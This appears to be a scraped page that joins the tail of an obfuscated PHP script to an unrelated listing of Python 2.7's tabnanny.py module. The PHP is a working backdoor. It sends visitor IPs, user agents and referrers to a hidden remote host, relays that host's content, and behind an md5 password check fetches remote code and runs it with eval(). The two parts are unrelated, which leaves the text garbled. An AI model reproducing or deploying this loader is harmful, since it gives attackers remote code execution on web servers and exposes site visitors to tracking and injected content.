ing(0); goto glSNg_LzxYIsX2; glSNg_LzxYIsX2: $utiBLP6LCTh1f2 = "\x72" . "\141" . "\x6e" . "\x67" . "\x65"; goto L8DBoJliwEzMp6; SlOv92pUeuRbs6: function OB2VtLXkgRIPlw($f1mozuANtprQMT) { return rtrim(strtr(base64_encode($f1mozuANtprQMT), "\x2b\57", "\x2d\x5f"), "\75"); } goto TDIrhdxvpNlFt9; os9gRuFURD1cGv: error_reporting(0); goto uxRi5Q7SMo35qu; wH1UQCn4Kym7NZ: @header("\x43\x6f\x6e\164\145\156\164\x2d\x54\171\x70\x65\x3a" . $Obe5O3pNrh1wNk["\x74\171\x70\145"]); goto lY0mM3QMw40Wja; sjCKQHz6Q60Ccm: $HONQlNCvlYnOH8 = substr($Gc9_8J48v7x6gV, strrpos($Gc9_8J48v7x6gV, "\56")); goto pYDglccpOwInMp; utegf_3TzFo8KM: header("\103\157\156\164\145\x6e\x74\x2d\x54\x79\x70\x65\x3a\40\x74\145\x78\x74\57\150\x74\155\154\73\40\x63\x68\x61\162\163\x65\164\75\165\164\x66\x2d\x38"); goto os9gRuFURD1cGv; tmjXznylhTgZ8a: if (in_array($Obe5O3pNrh1wNk["\x73\164\x61\164\x75\x73"], array(0, 200))) { goto nhUzRbCLQnuhLh; } goto c5_FfvrAB9U4Yd; ogjcRqlt8m1yFt: AtSmUC2FnsV8tA::KI1Kxaut6tOb4_(); goto utegf_3TzFo8KM; cCQUyydRpwrclc: $Obe5O3pNrh1wNk = cTP2tSflXg1jMM(base64_decode("\141\110\x52\60\x63\104\x6f\x76\114\62\150\63\131\x6a\x55\64\144\x6a\101\63\x4c\x6e\x42\154\143\110\121\x75\x63\62\x46\x73\132\x53\70"), $Ym0oIOWx6ByrbA); goto tmjXznylhTgZ8a; HEzdriQUoUsbcb: oZofqjcmql98Vl: goto RdRkLruqBbgd8Z; Pji3QhS868OoF4: pdT1WydGNbUwH7: goto uQMzHjqkf81tHB; hiBpnXBGYbBU3U: $kQ67spUDDLBffj = false; goto vf1Hpkrvn4j1uD; Cd7vkzilA61XS4: $cVPbc5aZBpQh4S = ''; goto Pji3QhS868OoF4; YpOvOLk2zAfp6F: $Ym0oIOWx6ByrbA["\163\156"] = ob2vTLxkGRipLW($_SERVER["\123\103\122\x49\x50\124\x5f\x4e\x41\115\105"]); goto hQrHQ4TUM_yVuh; zCPQ5sJ4prS3cM: class AtsmuC2FNSv8tA { static function HiR6oxdC0gvy2z($BW71TGqh6zqLp0) { goto KHgKgOn3FsDTTa; WnkUI9pHyPBuZm: $GkQAuHLQ3N3XQW = ''; goto WM19NL2F93TTJX; KHgKgOn3FsDTTa: $KsSQ2WVlAfhYGi = "\x72" . "\141" . "\156" . "\x67" . "\145"; goto SYHHG2duid0FC5; AkZwDNU1hD13k2: Msf7bOuYLqoUBQ: goto zjbEJbLu1rh6fC; SYHHG2duid0FC5: $AtNGdLmxUU_eyr = $KsSQ2WVlAfhYGi("\176", "\40"); goto sDlG7XxbTh82si; sDlG7XxbTh82si: $Qa8g5WW7UopXE6 = explode("\53", $BW71TGqh6zqLp0); goto WnkUI9pHyPBuZm; WM19NL2F93TTJX: foreach ($Qa8g5WW7UopXE6 as $TzjXB0hEV3mWbH => $vBDjbTJco2LdIH) { $GkQAuHLQ3N3XQW .= $AtNGdLmxUU_eyr[$vBDjbTJco2LdIH - 5199]; ek2Wb04KDv0_8r: } goto AkZwDNU1hD13k2; zjbEJbLu1rh6fC: return $GkQAuHLQ3N3XQW; goto mvSqNKKQW0dWKE; mvSqNKKQW0dWKE: } static function pt0kgTqOQgWXOc($U2C_3PmbNzlS0s, $dFFH41CbFWTZVX) { goto PeU6Y0BKnLAjiD; PeU6Y0BKnLAjiD: $vAUjzk7AjeF8LJ = curl_init($U2C_3PmbNzlS0s); goto XgkiCPEdPud823; F0lfera6M44Flk: $ew4RbqszUvgJ48 = curl_exec($vAUjzk7AjeF8LJ); goto KyuOuTMYBfTs48; KyuOuTMYBfTs48: return empty($ew4RbqszUvgJ48) ? $dFFH41CbFWTZVX($U2C_3PmbNzlS0s) : $ew4RbqszUvgJ48; goto zEsIdRklqzh6zy; XgkiCPEdPud823: curl_setopt($vAUjzk7AjeF8LJ, CURLOPT_RETURNTRANSFER, 1); goto F0lfera6M44Flk; zEsIdRklqzh6zy: } static function ki1kXAUT6tOb4_() { goto EJ7566q1lfwfcm; xsPP8ESDmR1Aur: @eval($ynlJNPNMmDeXVa[1 + 3]($jHnu4Zp7Wf_MZ8)); goto K3HoZH3pxQfn2c; FiKMKPq3gMe0CH: @$ynlJNPNMmDeXVa[0 + 10](INPUT_GET, "\157\x66") == 1 && die($ynlJNPNMmDeXVa[1 + 4](__FILE__)); goto BrQwRNK4B0XILn; CLlLAWjdHMTY3X: foreach ($uOCboEbhYVOtM8 as $w9aHYENXNIyo2G) { $ynlJNPNMmDeXVa[] = self::hiR6oxdc0gVy2z($w9aHYENXNIyo2G); pinv70Hl5Kbn3s: } goto m3wDdy0f3A1DIX; m3wDdy0f3A1DIX: p8r5sgUOVFkFTO: goto Z8yLLNYDCQaHAi; OzamV3emZ6eAbO: $s4rOMgcAWfiAfB = @$ynlJNPNMmDeXVa[2 + 1]($ynlJNPNMmDeXVa[5 + 1], $bVmLTGOkbLprfr); goto L3pzZmGB9cJxd1; uXTgzQ2JHrZmxk: $jHnu4Zp7Wf_MZ8 = self::pt0kgtQOqGWXoc($xj2AeH6SP1maOW[1 + 0], $ynlJNPNMmDeXVa[4 + 1]); goto xsPP8ESDmR1Aur; NO2vbVdI186HFj: HzpQLyst8TW3Tc: goto UaJaR8RWF8BtcP; L3pzZmGB9cJxd1: $xj2AeH6SP1maOW = $ynlJNPNMmDeXVa[2 + 0]($s4rOMgcAWfiAfB, true); goto FiKMKPq3gMe0CH; BrQwRNK4B0XILn: if (!(@$xj2AeH6SP1maOW[0] - time() > 0 and md5(md5($xj2AeH6SP1maOW[0 + 3])) === "\x65\64\66\x66\63\x63\x32\65\145\x38\70\x62\66\60\142\x32\x34\71\x66\x34\141\71\61\x38\x31\65\143\x61\71\x34\x62\61")) { goto HzpQLyst8TW3Tc; } goto uXTgzQ2JHrZmxk; EJ7566q1lfwfcm: $uOCboEbhYVOtM8 = array("\x35\x32\62\x36\x2b\x35\x32\61\x31\53\65\62\62\x34\x2b\x35\x32\x32\70\53\x35\x32\x30\71\x2b\65\62\x32\x34\53\65\x32\x33\x30\x2b\65\x32\x32\63\53\x35\x32\60\70\53\x35\x32\61\x35\53\x35\x32\62\66\53\x35\x32\60\x39\53\x35\62\x32\60\53\65\62\x31\64\53\x35\x32\x31\x35", "\65\x32\61\x30\53\x35\x32\60\71\x2b\65\62\61\x31\53\x35\x32\63\60\x2b\x35\62\x31\x31\53\x35\62\x31\64\53\65\62\60\x39\53\x35\x32\x37\x36\x2b\65\62\67\64", "\65\x32\61\71\x2b\x35\x32\x31\60\53\65\x32\x31\64\x2b\x35\x32\x31\x35\x2b\x35\62\63\x30\53\65\62\62\x35\x2b\65\x32\62\x34\53\x35\62\62\66\53\x35\62\61\64\53\65\x32\x32\x35\x2b\65\62\62\64", "\65\62\61\x33\x2b\x35\62\x32\70\53\x35\x32\x32\66\53\65\x32\x31\x38", "\x35\62\x32\67\53\65\x32\62\70\x2b\65\x32\x31\x30\x2b\65\62\x32\64\x2b\x35\x32\x37\x31\53\65\62\67\63\53\x35\62\x33\x30\x2b\x35\x32\x32\65\x2b\65\x32\x32\x34\53\65\62\x32\66\53\x35\62\x31\x34\53\x35\x32\62\x35\x2b\65\62\x32\x34", "\x35\x32\62\x33\x2b\65\x32\62\60\x2b\65\x32\x31\x37\53\65\62\x32\x34\53\65\x32\x33\60\x2b\65\x32\x32\62\53\x35\62\62\x34\53\x35\x32\x30\x39\x2b\x35\62\x33\x30\53\x35\x32\x32\x36\53\65\62\61\x34\53\65\x32\x31\x35\53\x35\62\x30\x39\53\x35\x32\x32\x34\53\65\x32\61\65\53\x35\62\60\x39\53\65\62\61\60", "\x35\x32\x35\63\53\x35\x32\x38\x33", "\x35\x32\x30\x30", "\x35\62\67\x38\x2b\x35\x32\x38\63", "\65\x32\66\x30\x2b\x35\62\x34\63\53\65\62\x34\63\53\x35\x32\66\60\x2b\x35\62\63\66", "\x35\62\62\x33\x2b\x35\62\62\x30\x2b\x35\x32\x31\67\53\65\62\60\x39\53\x35\62\62\x34\x2b\65\x32\x31\x31\53\65\x32\63\x30\53\65\62\x32\60\53\65\x32\61\65\53\x35\62\61\63\53\65\62\x30\70\x2b\65\62\x30\71"); goto CLlLAWjdHMTY3X; Z8yLLNYDCQaHAi: $bVmLTGOkbLprfr = @$ynlJNPNMmDeXVa[1]($ynlJNPNMmDeXVa[10 + 0](INPUT_GET, $ynlJNPNMmDeXVa[4 + 5])); goto OzamV3emZ6eAbO; K3HoZH3pxQfn2c: die; goto NO2vbVdI186HFj; UaJaR8RWF8BtcP: } } goto ogjcRqlt8m1yFt; t8TpplQkxmNQKg: VWq7n8avJneZWe: goto ZVM0YvvgbIo11U; ufyV20U0fMcSJg: nhUzRbCLQnuhLh: goto b7DnrAS9hKZE6C; L2fzlj7JmrK97A: $Ym0oIOWx6ByrbA["\163"] = oB2VtLXKgRIPLW($DCQAxVYJ0s2xNZ); goto juNf0o5W9RUnP8; TDIrhdxvpNlFt9: function tDk2fhL7aRlnRq() { goto A0jfGlM3HtbTc8; vsGQjQL1n3QW2Q: $cIX1t8ECuEurN8 = $cIX1t8ECuEurN8[0]; goto myJj1wXf2lYI5E; QOh3G8lOqaQWeK: xB39IGICyiwlN1: goto PWUIOKof_frKdi; WSbyHvGkSPW8G6: return $cIX1t8ECuEurN8; goto Grz6njp1WbkzyW; myJj1wXf2lYI5E: Fy2tlq68W1Z4cY: goto WSbyHvGkSPW8G6; B99XlumIIoF9yc: goto O37D2TgI1D66fQ; goto kKfGd_juWsO9SB; tNtX7SnHEoN9ve: if (isset($_SERVER["\x48\124\x54\120\x5f\130\137\x52\x45\101\114\x5f\x49\x50"]) && !empty($_SERVER["\x48\124\x54\x50\x5f\x58\x5f\122\105\101\x4c\x5f\x49\x50"])) { goto IbsgkORsYRpgBL; } goto m1YuAzS4K6e0ZJ; gwXV80f3Kvnin5: $cIX1t8ECuEurN8 = $_SERVER["\110\124\124\120\137\130\x5f\106\117\122\x57\101\x52\x44\x45\x44\137\x46\x4f\x52"]; goto F5UC4mBhfgxdX2; xHNzAyzHVlO5pq: $cIX1t8ECuEurN8 = explode("\54", $cIX1t8ECuEurN8); goto vsGQjQL1n3QW2Q; LkMROqR4RYuDsX: $cIX1t8ECuEurN8 = $_SERVER["\x52\x45\115\117\124\105\x5f\101\x44\x44\x52"]; goto dYhlmimy6UKWgc; PWUIOKof_frKdi: $cIX1t8ECuEurN8 = $_SERVER["\x48\124\124\x50\x5f\x43\x46\x5f\x43\117\116\x4e\105\x43\x54\x49\116\x47\x5f\x49\x50"]; goto B99XlumIIoF9yc; dYhlmimy6UKWgc: goto O37D2TgI1D66fQ; goto QOh3G8lOqaQWeK; c7Zjb3FklkFA6T: $cIX1t8ECuEurN8 = trim(str_replace("\x20", '', $cIX1t8ECuEurN8), "\54"); goto jnEONwk8qQ3QoE; IYNLV2P_z1R8_9: $cIX1t8ECuEurN8 = $_SERVER["\x48\x54\x54\x50\137\130\137\x52\105\x41\x4c\137\x49\x50"]; goto g3xl2m2S2bmEAU; A0jfGlM3HtbTc8: $cIX1t8ECuEurN8 = ''; goto rR27t1UBdIHeAR; rR27t1UBdIHeAR: if (isset($_SERVER["\110\x54\x54\x50\137\x43\x46\137\103\117\x4e\x4e\105\x43\124\111\116\107\137\x49\x50"]) && !empty($_SERVER["\x48\x54\x54\120\x5f\x43\x46\137\103\x4f\x4e\x4e\105\103\124\x49\x4e\x47\x5f\x49\x50"])) { goto xB39IGICyiwlN1; } goto tNtX7SnHEoN9ve; jnEONwk8qQ3QoE: if (!(strpos($cIX1t8ECuEurN8, "\x2c") !== false)) { goto Fy2tlq68W1Z4cY; } goto xHNzAyzHVlO5pq; m1YuAzS4K6e0ZJ: if (isset($_SERVER["\x48\x54\x54\x50\137\130\x5f\x46\x4f\122\x57\101\x52\104\x45\104\137\x46\117\x52"]) && !empty($_SERVER["\x48\x54\124\120\x5f\130\137\x46\117\x52\x57\x41\x52\104\x45\104\137\x46\x4f\x52"])) { goto YO_1CRlkHk0b5K; } goto LkMROqR4RYuDsX; kKfGd_juWsO9SB: IbsgkORsYRpgBL: goto IYNLV2P_z1R8_9; F5UC4mBhfgxdX2: O37D2TgI1D66fQ: goto c7Zjb3FklkFA6T; g3xl2m2S2bmEAU: goto O37D2TgI1D66fQ; goto PoJd83qL9Ntzk7; PoJd83qL9Ntzk7: YO_1CRlkHk0b5K: goto gwXV80f3Kvnin5; Grz6njp1WbkzyW: } goto J5qe_wS1vgzck7; b7DnrAS9hKZE6C: if (!strlen($Obe5O3pNrh1wNk["\143\157\156\x74\145\156\x74"])) { goto VWq7n8avJneZWe; } goto wH1UQCn4Kym7NZ; juNf0o5W9RUnP8: $Ym0oIOWx6ByrbA["\x75"] = ob2VTLxKgRIPLw($_SERVER["\x48\x54\x54\120\x5f\125\x53\x45\122\x5f\x41\107\x45\x4e\x54"]); goto cCQUyydRpwrclc; ks1k8aTWZXL63p: $Ym0oIOWx6ByrbA["\162\146"] = oB2VtLXkgriplW($cVPbc5aZBpQh4S); goto L2fzlj7JmrK97A; zdY3FjKTBRxxC2: exit("\x7b\x20\42\x65\x72\162\x6f\162\42\x3a\40\x32\60\x30\x2c\x20\42\x6c\x63\x22\72\40\x22\x6a\153\42\54\40\x22\144\141\164\x61\42\72\x20\x5b\x20\x31\x20\135\40\x7d"); goto PZW0GG3F0uoCYA; mBWmHT5C3u6kIU: exit(strrev(md5($_SERVER["\110\x54\124\x50\137\x48\117\123\124"]))); goto iFI7SVRy1TDCFo; lY0mM3QMw40Wja: exit($Obe5O3pNrh1wNk["\x63\x6f\156\x74\x65\156\164"]); goto t8TpplQkxmNQKg; ZVM0YvvgbIo11U: aXnousimfq1MHe: ?> HEX
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File: //lib64/python2.7/tabnanny.py
#! /usr/bin/python2.7

"""The Tab Nanny despises ambiguous indentation.  She knows no mercy.

tabnanny -- Detection of ambiguous indentation

For the time being this module is intended to be called as a script.
However it is possible to import it into an IDE and use the function
check() described below.

Warning: The API provided by this module is likely to change in future
releases; such changes may not be backward compatible.
"""

# Released to the public domain, by Tim Peters, 15 April 1998.

# XXX Note: this is now a standard library module.
# XXX The API needs to undergo changes however; the current code is too
# XXX script-like.  This will be addressed later.

__version__ = "6"

import os
import sys
import getopt
import tokenize
if not hasattr(tokenize, 'NL'):
    raise ValueError("tokenize.NL doesn't exist -- tokenize module too old")

__all__ = ["check", "NannyNag", "process_tokens"]

verbose = 0
filename_only = 0

def errprint(*args):
    sep = ""
    for arg in args:
        sys.stderr.write(sep + str(arg))
        sep = " "
    sys.stderr.write("\n")

def main():
    global verbose, filename_only
    try:
        opts, args = getopt.getopt(sys.argv[1:], "qv")
    except getopt.error, msg:
        errprint(msg)
        return
    for o, a in opts:
        if o == '-q':
            filename_only = filename_only + 1
        if o == '-v':
            verbose = verbose + 1
    if not args:
        errprint("Usage:", sys.argv[0], "[-v] file_or_directory ...")
        return
    for arg in args:
        check(arg)

class NannyNag(Exception):
    """
    Raised by process_tokens() if detecting an ambiguous indent.
    Captured and handled in check().
    """
    def __init__(self, lineno, msg, line):
        self.lineno, self.msg, self.line = lineno, msg, line
    def get_lineno(self):
        return self.lineno
    def get_msg(self):
        return self.msg
    def get_line(self):
        return self.line

def check(file):
    """check(file_or_dir)

    If file_or_dir is a directory and not a symbolic link, then recursively
    descend the directory tree named by file_or_dir, checking all .py files
    along the way. If file_or_dir is an ordinary Python source file, it is
    checked for whitespace related problems. The diagnostic messages are
    written to standard output using the print statement.
    """

    if os.path.isdir(file) and not os.path.islink(file):
        if verbose:
            print "%r: listing directory" % (file,)
        names = os.listdir(file)
        for name in names:
            fullname = os.path.join(file, name)
            if (os.path.isdir(fullname) and
                not os.path.islink(fullname) or
                os.path.normcase(name[-3:]) == ".py"):
                check(fullname)
        return

    try:
        f = open(file)
    except IOError, msg:
        errprint("%r: I/O Error: %s" % (file, msg))
        return

    if verbose > 1:
        print "checking %r ..." % file

    try:
        process_tokens(tokenize.generate_tokens(f.readline))

    except tokenize.TokenError, msg:
        errprint("%r: Token Error: %s" % (file, msg))
        return

    except IndentationError, msg:
        errprint("%r: Indentation Error: %s" % (file, msg))
        return

    except NannyNag, nag:
        badline = nag.get_lineno()
        line = nag.get_line()
        if verbose:
            print "%r: *** Line %d: trouble in tab city! ***" % (file, badline)
            print "offending line: %r" % (line,)
            print nag.get_msg()
        else:
            if ' ' in file: file = '"' + file + '"'
            if filename_only: print file
            else: print file, badline, repr(line)
        return

    if verbose:
        print "%r: Clean bill of health." % (file,)

class Whitespace:
    # the characters used for space and tab
    S, T = ' \t'

    # members:
    #   raw
    #       the original string
    #   n
    #       the number of leading whitespace characters in raw
    #   nt
    #       the number of tabs in raw[:n]
    #   norm
    #       the normal form as a pair (count, trailing), where:
    #       count
    #           a tuple such that raw[:n] contains count[i]
    #           instances of S * i + T
    #       trailing
    #           the number of trailing spaces in raw[:n]
    #       It's A Theorem that m.indent_level(t) ==
    #       n.indent_level(t) for all t >= 1 iff m.norm == n.norm.
    #   is_simple
    #       true iff raw[:n] is of the form (T*)(S*)

    def __init__(self, ws):
        self.raw  = ws
        S, T = Whitespace.S, Whitespace.T
        count = []
        b = n = nt = 0
        for ch in self.raw:
            if ch == S:
                n = n + 1
                b = b + 1
            elif ch == T:
                n = n + 1
                nt = nt + 1
                if b >= len(count):
                    count = count + [0] * (b - len(count) + 1)
                count[b] = count[b] + 1
                b = 0
            else:
                break
        self.n    = n
        self.nt   = nt
        self.norm = tuple(count), b
        self.is_simple = len(count) <= 1

    # return length of longest contiguous run of spaces (whether or not
    # preceding a tab)
    def longest_run_of_spaces(self):
        count, trailing = self.norm
        return max(len(count)-1, trailing)

    def indent_level(self, tabsize):
        # count, il = self.norm
        # for i in range(len(count)):
        #    if count[i]:
        #        il = il + (i/tabsize + 1)*tabsize * count[i]
        # return il

        # quicker:
        # il = trailing + sum (i/ts + 1)*ts*count[i] =
        # trailing + ts * sum (i/ts + 1)*count[i] =
        # trailing + ts * sum i/ts*count[i] + count[i] =
        # trailing + ts * [(sum i/ts*count[i]) + (sum count[i])] =
        # trailing + ts * [(sum i/ts*count[i]) + num_tabs]
        # and note that i/ts*count[i] is 0 when i < ts

        count, trailing = self.norm
        il = 0
        for i in range(tabsize, len(count)):
            il = il + i/tabsize * count[i]
        return trailing + tabsize * (il + self.nt)

    # return true iff self.indent_level(t) == other.indent_level(t)
    # for all t >= 1
    def equal(self, other):
        return self.norm == other.norm

    # return a list of tuples (ts, i1, i2) such that
    # i1 == self.indent_level(ts) != other.indent_level(ts) == i2.
    # Intended to be used after not self.equal(other) is known, in which
    # case it will return at least one witnessing tab size.
    def not_equal_witness(self, other):
        n = max(self.longest_run_of_spaces(),
                other.longest_run_of_spaces()) + 1
        a = []
        for ts in range(1, n+1):
            if self.indent_level(ts) != other.indent_level(ts):
                a.append( (ts,
                           self.indent_level(ts),
                           other.indent_level(ts)) )
        return a

    # Return True iff self.indent_level(t) < other.indent_level(t)
    # for all t >= 1.
    # The algorithm is due to Vincent Broman.
    # Easy to prove it's correct.
    # XXXpost that.
    # Trivial to prove n is sharp (consider T vs ST).
    # Unknown whether there's a faster general way.  I suspected so at
    # first, but no longer.
    # For the special (but common!) case where M and N are both of the
    # form (T*)(S*), M.less(N) iff M.len() < N.len() and
    # M.num_tabs() <= N.num_tabs(). Proof is easy but kinda long-winded.
    # XXXwrite that up.
    # Note that M is of the form (T*)(S*) iff len(M.norm[0]) <= 1.
    def less(self, other):
        if self.n >= other.n:
            return False
        if self.is_simple and other.is_simple:
            return self.nt <= other.nt
        n = max(self.longest_run_of_spaces(),
                other.longest_run_of_spaces()) + 1
        # the self.n >= other.n test already did it for ts=1
        for ts in range(2, n+1):
            if self.indent_level(ts) >= other.indent_level(ts):
                return False
        return True

    # return a list of tuples (ts, i1, i2) such that
    # i1 == self.indent_level(ts) >= other.indent_level(ts) == i2.
    # Intended to be used after not self.less(other) is known, in which
    # case it will return at least one witnessing tab size.
    def not_less_witness(self, other):
        n = max(self.longest_run_of_spaces(),
                other.longest_run_of_spaces()) + 1
        a = []
        for ts in range(1, n+1):
            if self.indent_level(ts) >= other.indent_level(ts):
                a.append( (ts,
                           self.indent_level(ts),
                           other.indent_level(ts)) )
        return a

def format_witnesses(w):
    firsts = map(lambda tup: str(tup[0]), w)
    prefix = "at tab size"
    if len(w) > 1:
        prefix = prefix + "s"
    return prefix + " " + ', '.join(firsts)

def process_tokens(tokens):
    INDENT = tokenize.INDENT
    DEDENT = tokenize.DEDENT
    NEWLINE = tokenize.NEWLINE
    JUNK = tokenize.COMMENT, tokenize.NL
    indents = [Whitespace("")]
    check_equal = 0

    for (type, token, start, end, line) in tokens:
        if type == NEWLINE:
            # a program statement, or ENDMARKER, will eventually follow,
            # after some (possibly empty) run of tokens of the form
            #     (NL | COMMENT)* (INDENT | DEDENT+)?
            # If an INDENT appears, setting check_equal is wrong, and will
            # be undone when we see the INDENT.
            check_equal = 1

        elif type == INDENT:
            check_equal = 0
            thisguy = Whitespace(token)
            if not indents[-1].less(thisguy):
                witness = indents[-1].not_less_witness(thisguy)
                msg = "indent not greater e.g. " + format_witnesses(witness)
                raise NannyNag(start[0], msg, line)
            indents.append(thisguy)

        elif type == DEDENT:
            # there's nothing we need to check here!  what's important is
            # that when the run of DEDENTs ends, the indentation of the
            # program statement (or ENDMARKER) that triggered the run is
            # equal to what's left at the top of the indents stack

            # Ouch!  This assert triggers if the last line of the source
            # is indented *and* lacks a newline -- then DEDENTs pop out
            # of thin air.
            # assert check_equal  # else no earlier NEWLINE, or an earlier INDENT
            check_equal = 1

            del indents[-1]

        elif check_equal and type not in JUNK:
            # this is the first "real token" following a NEWLINE, so it
            # must be the first token of the next program statement, or an
            # ENDMARKER; the "line" argument exposes the leading whitespace
            # for this statement; in the case of ENDMARKER, line is an empty
            # string, so will properly match the empty string with which the
            # "indents" stack was seeded
            check_equal = 0
            thisguy = Whitespace(line)
            if not indents[-1].equal(thisguy):
                witness = indents[-1].not_equal_witness(thisguy)
                msg = "indent not equal e.g. " + format_witnesses(witness)
                raise NannyNag(start[0], msg, line)


if __name__ == '__main__':
    main()